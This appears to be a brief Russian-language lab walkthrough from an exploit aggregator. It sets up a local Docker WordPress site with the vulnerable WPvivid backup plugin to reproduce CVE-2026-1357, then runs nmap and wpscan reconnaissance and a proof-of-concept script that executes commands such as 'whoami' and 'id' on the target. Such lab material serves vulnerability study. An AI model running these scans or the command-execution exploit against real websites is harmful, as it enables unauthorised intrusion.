## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CVES-LABS-CVE-2026-1357
# CVE-2026-1357
Лабораторная среда для CVE-2026-1357
# 1\. Сборка окружения
sudo apt update && sudo apt install docker.io docker-compose -y
sudo systemctl start docker
git clone [Link of Repo]
wget https://downloads.wordpress.org/plugin/wpvivid-backuprestore.0.9.123.zip
unzip wpvivid-backuprestore.0.9.123.zip
sudo docker-compose up -d
В FireFox:
http://localhost
Название сайта: Admin Cyber-Hub
Имя пользователя: Admin
Пароль: anything
Email: some-email@example.com
# 2\. Эксплуатация уязвимости:
Активируйте плагины и ключ в WordPress
pip3 install requests pycryptodome --break-system-packages
nmap -sV -sC localhost
wpscan --url http://localhost \--enumerate p --plugins-detection aggressive
python3 poc.py -u http://localhost -c "whoami"
python3 poc.py -u http://localhost -c "id"